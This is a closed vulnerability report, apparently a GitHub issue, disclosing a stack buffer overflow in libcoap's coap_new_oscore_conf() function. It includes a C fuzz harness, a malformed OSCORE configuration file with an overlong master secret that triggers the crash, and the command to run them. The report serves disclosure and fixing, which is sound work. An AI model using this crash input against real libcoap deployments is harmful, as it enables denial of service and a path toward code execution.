Closed
Description
Environment
- Build System: [Make]
- Operating System: [Linux]
- Operating System Version: [Ubuntu 20.04]
- Hosted Environment: [None]
Report
- [1] Vulnerabilities:
Stack-buffer-overflow in libcoap.
- [2] Affected Versions:
Unspecified version (additional versions could also be affected).
- [3] Vulnerability Type:
CWE-121: Stack Based Buffer Overflow
- [4] Vendor of Product:
Libcoap
- [5] Attack Type:
Local.
- [6] Impact:
Potential code execution, crash, etc. Permit the attacker to execute arbitrary code on affected installations.
- [7] Mitigation:
Overflow occurs in the handling of an input file in coap_new_oscore_conf() function. Proper boundary checking of the input file can provide a potential fix.
- [8] Reproducing the Issue:
file overflow-1.c
//
// Created by msxfxf on 24-1-24.
//
// afl-clang-fast overflow-1.c -v -I../include -I../ -lssl -lcrypto ../libcoap/.libs/libcoap-3-openssl.a -g -fsanitize=address -o overflow
#include "fcntl.h"
#include "unistd.h"
#include "coap3/coap_internal.h"
#include "oscore/oscore.h"
#include "oscore/oscore_context.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define MAX_LEN 1024
int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {
coap_context_t ctx[1];
coap_oscore_conf_t *oscore_conf;
cose_encrypt0_t cose[1];
uint8_t nonce_buffer[13];
coap_bin_const_t nonce = { 13, nonce_buffer };
if (Size < 1 || Size > MAX_LEN)
return 0;
const coap_str_const_t conf = { Size, Data };
memset(&ctx, 0, sizeof(ctx));
oscore_conf = coap_new_oscore_conf(conf, NULL, NULL, 0);
oscore_free_contexts(ctx);
coap_delete_oscore_conf(oscore_conf);
return 0;
}
#ifndef TESTING
int main(int argc, char **argv)
{
uint8_t Data[MAX_LEN];
size_t Size;
int fd;
if (argc != 2)
{
printf("Usage: %s <file>\n", argv[0]);
return 0;
}
fd = open(argv[1], O_RDONLY);
if (fd < 0)
{
perror("Error opening file");
return 1;
}
Size = read(fd, Data, MAX_LEN);
printf("Read %lu bytes from %s\n", Size, argv[1]);
LLVMFuzzerTestOneInput(Data, Size);
close(fd);
return 0;
}
#endif
file: crash0
#astsi0
hem,hex_aster_secret,hex,"0102030405060708090a0b0c0d0e0f1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111$11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111110"
Command: ./overflow-1 ./crash0.
Screenshot:

Metadata
Metadata
Assignees
Labels
No labels